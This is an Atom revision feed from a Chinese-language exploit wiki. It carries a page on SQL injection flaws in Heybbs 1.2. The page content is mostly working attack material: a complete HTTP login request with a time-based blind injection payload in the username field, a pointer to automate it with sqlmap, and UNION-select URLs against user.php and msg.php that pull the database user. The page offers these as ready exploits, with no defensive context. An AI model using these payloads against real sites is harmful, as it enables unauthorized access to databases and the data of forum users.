<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Heybbs_1.2_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E</id>
	<title>Heybbs 1.2 SQL注入漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Heybbs_1.2_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Heybbs_1.2_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-11T09:17:49Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Heybbs_1.2_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1694&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;第一處注入存在於login.php文件的username參數處： &lt;pre&gt; POST /php/login.php HTTP/1.1 Host: www.0-sec.org Content-Length: 98 Cache-Control: max-age=0 Upgrade-Insec...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Heybbs_1.2_SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E&amp;diff=1694&amp;oldid=prev"/>
		<updated>2021-04-15T13:25:41Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;第一處注入存在於login.php文件的username參數處： &amp;lt;pre&amp;gt; POST /php/login.php HTTP/1.1 Host: www.0-sec.org Content-Length: 98 Cache-Control: max-age=0 Upgrade-Insec...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;第一處注入存在於login.php文件的username參數處：&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /php/login.php HTTP/1.1&lt;br /&gt;
Host: www.0-sec.org&lt;br /&gt;
Content-Length: 98&lt;br /&gt;
Cache-Control: max-age=0&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
Origin: http://www.0-sec.org&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9&lt;br /&gt;
Referer: http://www.0-sec.org/login.php&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: zh-CN,zh;q=0.9&lt;br /&gt;
Cookie: PHPSESSID=qmpkek4l3ojr30gtodf6nj4hp4&lt;br /&gt;
Connection: close&lt;br /&gt;
&lt;br /&gt;
username=123123' and (select 1 from (select(sleep(5)))accn) AND '1'='1&amp;amp;password=123123&amp;amp;verify=h4ir&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
將username標*放入sqlmap -r&lt;br /&gt;
&lt;br /&gt;
第二處注入存在於user.php文件id參數處&lt;br /&gt;
&lt;br /&gt;
Eg:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
http://www.0-sec.org/user.php?id=177 and 1=2 union select 1) ,user(),3,4,5,6,7,8,9,10&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
第三處注入存在於msg.php文件id參數處&lt;br /&gt;
&lt;br /&gt;
Eg:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;http://www.0-sec.org/msg.php?id=1 and 1=2 union select 1) ,2,3,user(),5,6,7,8,9,10,11,12&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Eg:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;http://www.0-sec.org/msg.php?id=1 and 1=2 union select 1) ,2,3,user(),5,6,7,8,9,10,11,12&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>